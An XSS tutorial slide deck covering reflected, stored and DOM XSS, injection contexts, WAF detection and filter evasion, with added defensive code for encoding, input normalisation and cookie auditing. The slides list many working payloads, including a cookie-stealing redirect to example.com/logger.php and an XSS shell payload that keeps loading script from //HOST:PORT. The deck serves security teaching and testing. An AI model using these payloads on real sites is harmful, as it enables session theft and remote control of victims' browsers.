
Page 1: XSS Primer - Noob to Pro in 1 hour

XSS Primer: Noob to Pro in 1 hour

By @snoopy_security

Page 2: Who and Why

• Student & Junior Security Consultant.

• XSS is an easy win if you do it correctly.

• Bug bounties pay well and clients give you respect.

• Cross-site scripting is one of the oldest known web application attacks, dating from around 1996-1998.

Page 3: What is XSS?

Untrusted data from the user is processed by the application without any sort of validation.

It affects the client side, but the vulnerability resides on the server side.

Different types: Reflected, Stored and DOM XSS.

Page 4: What is XSS?

Page 5: Reflected XSS

<?php echo '<h1>Hello ' . $_GET["name"] . '</h1>';

What is wrong with the above code?

The above code just prints the value retrieved from the $_GET variable.

Malicious JavaScript can be added to the original URL.

Page 6: Some Beginner Tips

XSS can come from anywhere. Some common sources are:

• URL parameters
• Headers, e.g. User-Agent
• Metadata
• Input forms
• Text areas
• Hidden fields
• Flash parameters
• File uploads

Page 7: Some Beginner Tips

1. Try injecting HTML tags as well as malicious JavaScript.

2. SVG is always good for a short and crisp attack vector. You can add whitespace, forward slashes and unclosed tags.

3. Add junk data with your payload.

4. Always try a couple of different payloads. This mainly applies when trying to evade filters.

"><svg/onload=prompt(1)>

Page 8: Stored XSS

The malicious payload is stored by the server, in a database or other form of storage, and is reflected back.

This form of attack is easier than phishing with XSS payloads.

Can get admin cookies as well as access to the internal network, depending on the attack vector.

Page 9: DOM XSS

The Document Object Model is a structured representation of the web page rendered by the browser.

The DOM is where event handlers and any other JavaScript functions execute. The DOM shows all the JavaScript and HTML rendered by your browser.

The DOM defines the way a web page is accessed and manipulated.

An attacker can manipulate the DOM by adding malicious JavaScript which changes elements set by the DOM to attack a victim.

Page 10: DOM XSS

To find DOM XSS, analyse the JavaScript being executed on the page and see if the DOM is being written to.

The DOM is not "view source". Inspect element is a better visual representation of the DOM.

ZAP, Burp and other proxies do pick up unsafe methods, but you will need to check manually.

If it cannot be exploited, try figuring out what library and unsafe sink the application is using, e.g. jQuery .attr()

Page 11: DOM XSS

Common methods used to access the DOM (sources):

document.location
document.URL
document.URLUnencoded
document.referrer
window.location

Passed data can then be written by methods (sinks) such as eval, document.write and window.setInterval.
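The sources and sinks listed on the last two slides are what a reviewer greps for when looking for DOM XSS. The following is an added example, not code from the slides: a small triage helper (hypothetical names findDomSourcesAndSinks and sameLineFlows) that scans a page's JavaScript for those sources and sinks and reports lines where both appear together. It is a plain substring scan for manual review, not taint tracking, so a hit means "look here", and the sample script it runs over is constructed for the example.

```javascript
// Added example (not from the slides): a code-review helper that flags lines of
// client-side JavaScript which read from a DOM XSS source or write to a
// dangerous sink. A plain substring scan: a hit only means "look here", and a
// value that passed through a sanitiser on an earlier line is still reported.

// Sources listed on the slide (where attacker-controlled data enters the page).
const DOM_SOURCES = [
  "document.location", "document.URL", "document.URLUnencoded",
  "document.referrer", "window.location", "location.hash", "location.search",
];

// Sinks listed on the slides (eval, document.write, setInterval, jQuery .attr)
// plus the common DOM ones from the OWASP cheat sheet the slides point to.
const DOM_SINKS = [
  "eval(", "document.write(", "setInterval(", "setTimeout(",
  "innerHTML", "outerHTML", "insertAdjacentHTML(", ".attr(",
];

// Scan a JavaScript file's text; one record per (line, match):
// { line, kind: "source" | "sink", match, text }.
function findDomSourcesAndSinks(jsText) {
  const findings = [];
  jsText.split(/\r?\n/).forEach((text, idx) => {
    const trimmed = text.trim();
    if (trimmed.startsWith("//")) return;                 // skip line comments
    for (const s of DOM_SOURCES) {
      if (text.includes(s)) findings.push({ line: idx + 1, kind: "source", match: s, text: trimmed });
    }
    for (const s of DOM_SINKS) {
      if (text.includes(s)) findings.push({ line: idx + 1, kind: "sink", match: s, text: trimmed });
    }
  });
  return findings;
}

// Lines where a source and a sink appear together deserve the first look:
// the tainted value reaches the sink with no intermediate step to inspect.
function sameLineFlows(findings) {
  const byLine = new Map();
  for (const f of findings) {
    const entry = byLine.get(f.line) || { line: f.line, sources: [], sinks: [], text: f.text };
    (f.kind === "source" ? entry.sources : entry.sinks).push(f.match);
    byLine.set(f.line, entry);
  }
  return [...byLine.values()].filter(e => e.sources.length > 0 && e.sinks.length > 0);
}

// Constructed sample page script (not real code from any application).
const SAMPLE_JS = [
  "// greeting widget",
  "var name = decodeURIComponent(location.hash.slice(1));",          // source
  'document.getElementById("greet").innerHTML = "Hi " + name;',      // sink, fed by line 2
  'document.write("<p>" + document.referrer + "</p>");',              // source and sink on one line
  'document.getElementById("safe").textContent = name;',             // textContent is not a sink
  "setTimeout(function () { refresh(); }, 1000);",                    // sink with a constant argument
].join("\n");

// findDomSourcesAndSinks(SAMPLE_JS) flags lines 2, 3, 4 (twice) and 6;
// sameLineFlows(...) narrows that to line 4.
```

Run it over the JavaScript a proxy captured for the page; the line-3 hit in the sample shows why the two-line case (source on one line, innerHTML on the next) still has to be read by hand.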

Page 12: Useful sources

OWASP DOM XSS prevention cheat sheet: gives a good explanation of the unsafe methods that directly modify the DOM.

The DOM XSS wiki: https://code.google.com/p/domxsswiki/wiki/Introduction

The wiki has useful information on dangerous methods, common sources and sinks.

Other variations include Mutation XSS. More on that later…

Page 13: Context is Everything

Context is where the given input is reflected back.

Five common ones:

1. HTML
2. Attributes
3. Script
4. URL
5. Style

Page 14: HTML Context

Malicious input is reflected back in the HTML body, in tags such as <div>, <p>, <title> and more.

Easiest to attack.

Close the tag and try <script>alert(1)</script> or any similar payload.

Page 15: Attribute Context

HTML elements can have attributes. Attributes are

Input is reflected in an attribute of an element, so look for input being reflected back in 'value=' or 'alt=' or something similar.

Most of the time, attributes will be inside single or double quotes.

Page 16: Couple of tips

1. Break out of the context by closing the quote and the attribute tag, e.g. '>

2. Any type of encoding won't help your payload if you can't break out of the context.

3. If in doubt, URL-encode any special characters that have significance: & = + ; and space.

4. Event handlers can also be used to attack attributes, e.g. aas' onload='prompt(0);''

Page 17: Script Context

The input will be reflected back inside a script tag. Break out of the text with quotes and execute.

Input is usually reflected back as part of a variable.

Payload example: junk'; alert(1);//

Page 18: URL Context

The input is reflected back in an href (or src) attribute, e.g.

<iframe src="[Reflected Data]">
<a href="[Reflected Data]">Link</a>
<META http-equiv="refresh" content="[Reflected Data]">

No need to break out of the context; you only need to encode the payload. This type of context requires the victim to click the URL to execute.

Page 19: Tips

Common ways to attack the URL context:

javascript:prompt(0)

data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

The second payload is base64 encoded. More about encoding later.

You can also define the charset, just like the data type, which might be useful in some cases.

Page 20: CSS Context

Also known as style context. Input is usually reflected inside a style tag.

Can be attacked using

Another common one:

width:expression(alert('XSS'))
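The PHP one-liner on page 5 and the contexts on pages 13 to 20 share one fix: encode the reflected value for the context it lands in, so that there is no quote, angle bracket or scheme left to "break out" with. The following is an added example in JavaScript, not code from the slides: a hypothetical renderGreeting() that builds the page-5 greeting with a separate encoder for the HTML body, an attribute value, a JS string literal and a URL attribute (assumed names encodeHtml, encodeHtmlAttr, encodeJsString and safeUrl). The style context is deliberately left out: the safe answer there is not to reflect user input into CSS at all.

```javascript
// Added example (not from the slides): output encoding chosen per context.
// The slides' PHP line echoes $_GET["name"] straight into <h1>; the same page
// built with a per-context encoder looks like this. Once every character that
// could close the current context is encoded, a payload has nothing to break out of.

// HTML body context: <div>, <p>, <title> ... (slide "HTML Context").
function encodeHtml(s) {
  return String(s).replace(/[&<>"'\/]/g, c => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;", "/": "&#x2F;",
  })[c]);
}

// Attribute context: always quote the attribute and encode everything except
// alphanumerics as &#xHH;, so neither a quote nor a space can start a new
// attribute such as onload= (slides "Attribute Context" / "Couple of tips").
function encodeHtmlAttr(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, c => "&#x" + c.charCodeAt(0).toString(16).toUpperCase() + ";");
}

// Script context: the value sits inside a quoted JS string literal; \xHH / \uHHHH
// escaping stops ' " ; < > / from ending the string or the <script> element
// (slide "Script Context", payload junk'; alert(1);//).
function encodeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, c => {
    const code = c.charCodeAt(0);
    return code < 256 ? "\\x" + code.toString(16).padStart(2, "0")
                      : "\\u" + code.toString(16).padStart(4, "0");
  });
}

// URL context: encoding alone is not enough, because javascript: and data: are
// made of perfectly valid URL characters. The scheme has to be allowlisted first
// (slides "URL Context" / "Tips"); anything else becomes a harmless "#".
function safeUrl(s) {
  const url = String(s).trim();
  if (!/^(https?:\/\/|\/(?!\/)|#)/i.test(url)) return "#";   // rejects javascript:, data:, vbscript:, //host
  return encodeHtmlAttr(url);
}

// The slides' greeting page, rendered safely. The vulnerable PHP original was:
//   <?php echo '<h1>Hello ' . $_GET["name"] . '</h1>';
function renderGreeting(name, homepage) {
  return [
    "<h1>Hello " + encodeHtml(name) + "</h1>",
    '<input value="' + encodeHtmlAttr(name) + '">',
    "<script>var user = '" + encodeJsString(name) + "';</script>",
    '<a href="' + safeUrl(homepage) + '">home</a>',
  ].join("\n");
}
```

The attribute and JS encoders are deliberately aggressive (everything but alphanumerics) because the cost is a few bytes and the benefit is that the list of "dangerous" characters never has to be maintained.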

Page 21: WAF Detection

Usually regex, blacklist or whitelist based.

A WAF can sometimes detect outbound as well as inbound traffic.

Most WAFs still detect using a signature-based approach.

Common ways to detect WAFs: modified cookies, rewritten headers and response codes.

Page 22: WAF Detection

Find combinations of allowed and blocked characters first.

Some known tools to detect WAFs:

• Wafw00f
• http-waf-fingerprint NSE script
• http-waf-detect NSE script

These will only detect the popular ones.

xss,<>{};"'script

Page 23: Filter Evasion 101

More than one way to skin a web app! If the <script> tag is blocked:

"><script >alert(document.cookie)</script >
"><ScRiPt>alert(document.cookie)</ScRiPt>
"%3e%3cscript%3ealert(document.cookie)%3c/script%3e
"><scr<script>ipt>alert(document.cookie)</scr</script>ipt>
%00"><script>alert(document.cookie)</script>

If the site is filtering double and single quotes, you can use the backtick (`). This technique only works on IE.

Page 24: Filter Evasion

Some popular techniques consist of spaces, encoding and comments. Try using prompt or confirm instead of alert.

Call an external JavaScript file from inside a script src tag if brackets and quotes are blocked:

<SCRIPT SRC=https://web.archive.org/web/20150121175718/http://ha.ckers.org/xss.js></SCRIPT>

If the application is filtering quotes or blocking script tags, try the below:

<img/src=x onerror=prompt(/XSS/);>

Page 25: Filter Evasion

When in doubt, try to comment out everything after your payload:

<script>alert(1)</script><!-- (HTML/attribute context)
";alert(5);// (script context)

If the less-than and greater-than signs are filtered in an attribute context, try:

" onload="prompt(0);""

If script and src tags are blocked in an HTML context, try:

<object data="javascript:alert(0)">

Page 26: Filter Evasion resources

Too many techniques to present. Check them out here:

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

http://codev587.net/xss-filter-evasion-cheat-sheet-no1.html

http://n0p.net/penguicon/php_app_sec/mirror/xss.html

Page 27: Encoding

Encoding: transferring data from one format to another, e.g. ASCII, Unicode, URL encoding etc.

Browsers support numerous encoding schemes, but the attack vector depends on the page and its meta tag, e.g.

Encoding is useful if the server is decoding correctly. You still need to break out of the context correctly for the encoded payload to work.

<svg/onload=alert&#40&#41>>

Page 28: Encoding

The following table describes how a user can obfuscate an IP address:

URL                            Form
http://127.0.0.1/              Decimal
http://2130706433/             Dword
http://0x7f.0x00.0x00.0x01/    Hex
http://0177.0000.0000.0001/    Octal
http://127.0x00.0000.0x01/     Mixed

This trick is getting more common among phishers, e.g. http://0xd2.0xdb.0xf1.0x7b/.online/BankofAmericaOnlineID/SignIn
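Every notation in the table resolves to the same address, which is why a blocklist, a proxy log search or an "is this one of our own addresses?" check that compares host strings literally is easy to slip past. The following is an added example, not code from the slides: hypothetical functions parseIpPart, normaliseIpvt4, hostOfUrl and canonicalHost that apply the inet_aton rules (0x prefix is hex, leading 0 is octal, fewer than four parts let the last part fill the remaining bytes) to turn any of the table's forms back into dotted-decimal before a comparison is made.

```javascript
// Added example (not from the slides): normalise the obfuscated IPv4 notations
// from the table back to dotted-decimal, the way a browser or inet_aton() reads
// them, so that URL filtering and log searches compare the real host.

// Parse one dot-separated part as inet_aton does: 0x.. is hex, a leading 0 is octal, otherwise decimal.
function parseIpPart(part) {
  let m;
  if ((m = /^0[xX]([0-9a-fA-F]+)$/.exec(part))) return parseInt(m[1], 16);
  if ((m = /^0([0-7]+)$/.exec(part))) return parseInt(m[1], 8);
  if (/^(0|[1-9][0-9]*)$/.test(part)) return parseInt(part, 10);
  return NaN;
}

// Returns the canonical "a.b.c.d" string, or null when the host is not an IPv4
// literal in any accepted notation (a hostname, an IPv6 literal, or garbage).
function normaliseIpv4(host) {
  const parts = host.split(".");
  if (parts.length > 4) return null;
  const nums = parts.map(parseIpPart);
  if (nums.some(n => Number.isNaN(n))) return null;
  // inet_aton rule: the last part fills every remaining byte, so one part is a
  // 32-bit "dword", two parts are 8 + 24 bits, three are 8 + 8 + 16, four are 8 each.
  const lastMax = 2 ** (8 * (5 - parts.length));
  for (let i = 0; i < nums.length - 1; i++) if (nums[i] > 255) return null;
  if (nums[nums.length - 1] >= lastMax) return null;
  let value = 0;
  for (let i = 0; i < nums.length - 1; i++) value = value * 256 + nums[i];
  value = value * lastMax + nums[nums.length - 1];
  return [value >>> 24, (value >>> 16) & 255, (value >>> 8) & 255, value & 255].join(".");
}

// Extract the host of an absolute URL: scheme, optional userinfo up to "@",
// then everything before the port, path, query or fragment.
function hostOfUrl(url) {
  const m = /^[a-z][a-z0-9+.-]*:\/\/(?:[^/?#@]*@)?([^/?#:]+)/i.exec(url);
  return m ? m[1] : null;
}

// The host as a blocklist or allowlist should see it: the normalised IPv4
// address if it is one, otherwise the lower-cased hostname.
function canonicalHost(url) {
  const host = hostOfUrl(url);
  if (host === null) return null;
  return normaliseIpv4(host) || host.toLowerCase();
}
```

Feed canonicalHost() the URLs from a proxy or mail-gateway log and compare its output, not the raw host string, against the list; the phishing URL on the slide then shows up as 210.219.241.123 no matter how it was written.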

Page 29: Encoding

The fromCharCode() method converts Unicode values into characters:

<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

Long UTF-8 Unicode encoding to bypass filters:

<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">

Page 30: Encoding

Encoding can also be useful to break up an XSS payload if the server is using pattern-matching regex:

<IMG SRC="jav&#x09;ascript:alert('XSS');">

Payloads can also be double-encoded. Whether it works depends on how the application processes encoded client requests.

The hexadecimal encoding of "../" is "%2E%2E%2F"; the double encoding of "../" is "%252E%252E%252F".

Page 31: More Filter Evasion

ASCII decimal encoded:

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;

Will turn into alert('XSS'). The payload uses HTML entities, which are decoded and rendered by the browser.

ASCII hex encoded:

&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x27;&#x58;&#x53;&#x53;&#x27;&#x29;

Useful for bypassing 'magic_quotes_gpc'.
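Pages 29 to 31 show the same javascript: URL written four ways: decimal entities, hex entities, zero-padded entities with no semicolons, and with a tab (&#x09;) dropped into the scheme, plus "../" hidden behind double percent-encoding on page 30. A filter that matches the literal text misses all of them, which is the defender's lesson from these slides: decode the way the browser will before matching. The following is an added example, not code from the slides: hypothetical functions decodeNumericEntities, percentDecodeFully, stripUrlWhitespace, normaliseForMatching and looksLikeScriptUrl that model that decoding order (HTML character references first, then repeated percent-decoding, then removal of the tab/newline characters browsers ignore in a URL). It is a simplified model, not a full HTML parser, and the sample strings are copied from the forms on the slides.

```javascript
// Added example (not from the slides): the decoding a filter must apply before
// a signature such as "javascript:" can match the encoded forms on the slides.
// Order mirrors the browser: the HTML parser decodes character references,
// then the URL parser percent-decodes and drops tab/newline characters.

// Decode &#NNN; and &#xHH; (semicolon optional, leading zeros allowed) plus the
// few named references that matter inside a URL. Anything else is left as is.
function decodeNumericEntities(s) {
  const named = { amp: "&", lt: "<", gt: ">", quot: '"', apos: "'", tab: "\t", newline: "\n" };
  return s.replace(/&(#[xX][0-9a-fA-F]+|#[0-9]+|[a-zA-Z]+);?/g, (m, body) => {
    if (body[0] === "#") {
      const hex = body[1] === "x" || body[1] === "X";
      const code = hex ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
      return code > 0x10FFFF ? m : String.fromCodePoint(code);
    }
    const name = body.toLowerCase();
    return Object.prototype.hasOwnProperty.call(named, name) ? named[name] : m;
  });
}

// Percent-decode until the string stops changing, which catches %252E (double
// encoding) as well as %2E. Bounded so a long chain of %25 cannot spin forever.
function percentDecodeFully(s, maxRounds = 3) {
  let cur = s;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(cur); } catch (e) { return cur; }   // malformed %xx: stop here
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Browsers strip tab, LF and CR anywhere in a URL and leading control
// characters, so "jav<TAB>ascript:" is still the javascript scheme.
function stripUrlWhitespace(s) {
  return s.replace(/[\t\n\r]/g, "").replace(/^[\x00-\x20]+/, "");
}

function normaliseForMatching(s) {
  return stripUrlWhitespace(percentDecodeFully(decodeNumericEntities(s)));
}

// The same signature applied to raw and to normalised input.
const SCRIPT_URL_RE = /^\s*(javascript|vbscript|data)\s*:/i;
function looksLikeScriptUrl(raw) {
  return SCRIPT_URL_RE.test(normaliseForMatching(raw));
}

// Constructed samples, copied from the forms shown on the slides.
const SAMPLES = {
  decimal: "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;",
  hex: "&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x27;&#x58;&#x53;&#x53;&#x27;&#x29;",
  padded: "&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041",
  tab: "jav&#x09;ascript:alert('XSS');",
  doubleEncoded: "%252E%252E%252F",
};
// normaliseForMatching(SAMPLES.decimal) === "javascript:alert('XSS')", and the
// hex and padded forms give the same string; SCRIPT_URL_RE misses SAMPLES.tab
// on the raw text but looksLikeScriptUrl(SAMPLES.tab) is true.
```

The point of the example is the order and the repetition, not the regex at the end: a signature that runs before normalisation, or that percent-decodes once, is exactly what the double-encoding slide is aimed at.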

Page 32: Encoding

More examples here:
http://htmlpurifier.org/live/smoketests/xssAttacks.php
https://danielmiessler.com/study/encoding/

Some useful encoders:
http://n0p.net/penguicon/php_app_sec/mirror/xss.html
http://evuln.com/tools/xss-encoder/
https://mothereff.in/html-entities
http://dev.w3.org/html5/html-author/charref
https://hackvertor.co.uk/public
http://utf-8.jp/public/jjencode.html?src=

Page 33: Actual attack vectors

<script>window.location="http://example.com/logger.php?cookie="+document.cookie;</script>

When executed, the above code sends the victim's cookie to an attacker-controlled site.

XSS can be used for many things, including cookie stealing, drive-by downloads, running browser exploits, phishing and more.

BeEF makes everything easy.

More cool XSS payloads: http://www.xss-payloads.com/
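The cookie-stealing vector above only works because document.cookie can read the session cookie, and that is controlled by one attribute on the Set-Cookie header: a cookie marked HttpOnly is never exposed to script, so an XSS that succeeds still cannot carry the session off. The following is an added example, not code from the slides: hypothetical parseSetCookie and auditSetCookie functions that read a Set-Cookie response header and report which of HttpOnly, Secure and SameSite are missing, which is a quick check to run over a proxy capture when triaging an XSS finding. The two headers it runs over are constructed for the example.

```javascript
// Added example (not from the slides): audit a Set-Cookie header for the
// attributes that limit what a successful XSS can do with the session cookie.

// Parse "Set-Cookie: name=value; Attr; Attr=val" into its parts. Attribute
// names are case-insensitive per RFC 6265, so they are lower-cased here.
function parseSetCookie(header) {
  const body = header.replace(/^set-cookie:\s*/i, "");
  const [pair, ...attrs] = body.split(";").map(p => p.trim());
  const eq = pair.indexOf("=");
  const cookie = {
    name: eq < 0 ? pair : pair.slice(0, eq),
    value: eq < 0 ? "" : pair.slice(eq + 1),
    attributes: {},
  };
  for (const a of attrs) {
    if (!a) continue;
    const i = a.indexOf("=");
    const key = (i < 0 ? a : a.slice(0, i)).trim().toLowerCase();
    cookie.attributes[key] = i < 0 ? true : a.slice(i + 1).trim();
  }
  return cookie;
}

// Report what is missing. readableByScript is the direct answer to the slide's
// question: can document.cookie (and so the logger.php payload) see this cookie?
function auditSetCookie(header) {
  const c = parseSetCookie(header);
  const missing = [];
  const httpOnly = c.attributes.httponly === true;
  if (!httpOnly) missing.push("HttpOnly");
  if (c.attributes.secure !== true) missing.push("Secure");
  const sameSite = c.attributes.samesite;
  if (typeof sameSite !== "string" || !/^(lax|strict)$/i.test(sameSite)) missing.push("SameSite=Lax|Strict");
  return { name: c.name, readableByScript: !httpOnly, missing };
}

// Constructed headers (not from any real application): the kind of session
// cookie the PHP example on page 5 would set, weak and hardened.
const WEAK_HEADER = "Set-Cookie: PHPSESSID=abc123; Path=/";
const HARDENED_HEADER = "Set-Cookie: PHPSESSID=abc123; Path=/; HttpOnly; Secure; SameSite=Lax";
```

HttpOnly does not fix the XSS itself: injected script can still act on the page as the user, so it belongs next to output encoding, not instead of it.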

Page 34: Useful tools

Opinion: most scanners suck at finding XSS.

A couple of tools I like: Xenotix, the XSSValidator Burp plugin, Sleepy Puppy (if testing multiple applications; has trackable XSS payloads).

How to build a scanner that works?
A - Scanning within a browser engine.
B - Using PhantomJS or a similar WebKit engine to detect successful reflected XSS.

I still prefer finding XSS manually, but I like having options.

Page 35: XSS Shell Demo

Cool POC by Brutelogic. A more fun way to report XSS than just <script>alert(1)</script>.

Attacker machine listener

Target payload: <svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)>

Page 36: Things I didn't mention

Flash XSS: embedded SWF files can be decompiled to source code. This can be used to find unfiltered variables which can be called from a URL to include malicious XSS.

XSS Polyglot: upload a Flash file that is also accepted as valid JavaScript. Run remote XSS with a src tag (can beat CSP in rare cases).

Mutation XSS: there are more ways to trick the DOM into parsing malicious XHTML-like payloads.

All worth checking out…

Page 37

@snoopy_security

IRC: #SHUHACKSOC
Website: http://shuhacksoc.co.uk